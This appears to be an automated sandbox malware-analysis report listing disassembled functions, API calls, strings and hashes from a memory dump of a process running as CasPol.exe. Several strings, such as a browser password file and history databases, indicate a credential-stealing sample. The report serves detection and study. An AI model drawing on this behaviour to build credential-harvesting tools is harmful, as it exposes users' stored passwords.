                                                                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4247780290-0
                                                                                                                                                                                  • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                  • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                                                                                  • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                                                                                  Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                                  • memset.MSVCRT ref: 004450CD
                                                                                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                    • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1471605966-0
                                                                                                                                                                                  • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                                                                                  • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                                                                                  • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                                                                  Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                                                                  • wcscat.MSVCRT ref: 0044476E
                                                                                                                                                                                  • wcscat.MSVCRT ref: 0044477F
                                                                                                                                                                                  • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                    • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                                                                                                                                    • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                                  • String ID: \StringFileInfo\
                                                                                                                                                                                  • API String ID: 102104167-2245444037
                                                                                                                                                                                  • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                                  • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                                                                                  • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                                  • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                                                                                  Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??3@
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 613200358-0
                                                                                                                                                                                  • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                  • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                                                                                                  Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _memicmpwcslen
                                                                                                                                                                                  • String ID: @@@@$History
                                                                                                                                                                                  • API String ID: 1872909662-685208920
                                                                                                                                                                                  • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                                                                  • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                                                                  • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                                                                                                  Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 004100FB
                                                                                                                                                                                  • memset.MSVCRT ref: 00410112
                                                                                                                                                                                    • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                    • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                                  • String ID: </%s>
                                                                                                                                                                                  • API String ID: 3400436232-259020660
                                                                                                                                                                                  • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                                  • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                                                                                  • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                                                                                  Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040D58D
                                                                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                                                                                  • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                                  • String ID: caption
                                                                                                                                                                                  • API String ID: 1523050162-4135340389
                                                                                                                                                                                  • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                                                  • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                                                                                  • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                                                  • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                                                                                  Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                                                    • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                                                  • String ID: MS Sans Serif
                                                                                                                                                                                  • API String ID: 210187428-168460110
                                                                                                                                                                                  • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                                  • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                                                                                  Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ClassName_wcsicmpmemset
                                                                                                                                                                                  • String ID: edit
                                                                                                                                                                                  • API String ID: 2747424523-2167791130
                                                                                                                                                                                  • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                                                                                                  • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                                                                                                  • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                                                                                                  Function 00414E13 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,shlwapi.dll,750A375A,?,00405751,00000000), ref: 00414E2B
                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                  • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                  • API String ID: 3150196962-1506664499
                                                                                                                                                                                  • Opcode ID: d2abe1e6ce67af05a23a9289f1a003983cf5919859a34de4ac3658ffea157a86
                                                                                                                                                                                  • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                                                                                                  • Opcode Fuzzy Hash: d2abe1e6ce67af05a23a9289f1a003983cf5919859a34de4ac3658ffea157a86
                                                                                                                                                                                  • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                                                                                                  Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                                                                                                  • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                                                                                                  • memcmp.MSVCRT ref: 0041D8CB
                                                                                                                                                                                  • memcmp.MSVCRT ref: 0041D913
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy$memcmp
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3384217055-0
                                                                                                                                                                                  • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                  • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                                                                                                  • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                                                                                                  Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$memcpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 368790112-0
                                                                                                                                                                                  • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                                                                  • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                                                                                                  • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                                                                                                  Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                                                                                                    • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                                                                                                    • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                                                                                                    • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                                                                                                    • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                                                                                                  • GetMenu.USER32(?), ref: 00410F8D
                                                                                                                                                                                  • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                                                                                                  • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                                                                                                  • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1889144086-0
                                                                                                                                                                                  • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                                  • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                                                                                                  • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                                  • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                                                                                                  Function 00417FD5 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                                                                                                  • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041810A
                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1661045500-0
                                                                                                                                                                                  • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                  • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                                                                                                  • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                                                                                                  Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                                                                                                  • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                                                                                                  • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpymemset
                                                                                                                                                                                  • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                                  • API String ID: 1297977491-2063813899
                                                                                                                                                                                  • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                  • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                                                                                                  • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                                                                                                  Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040560C
                                                                                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                    • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                    • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                    • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                    • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                  • String ID: *.*$dat$wand.dat
                                                                                                                                                                                  • API String ID: 2618321458-1828844352
                                                                                                                                                                                  • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                                  • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                                  • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                                                                                  Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                                    • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                                                                  • wcslen.MSVCRT ref: 00410C74
                                                                                                                                                                                  • _wtoi.MSVCRT(?), ref: 00410C80
                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
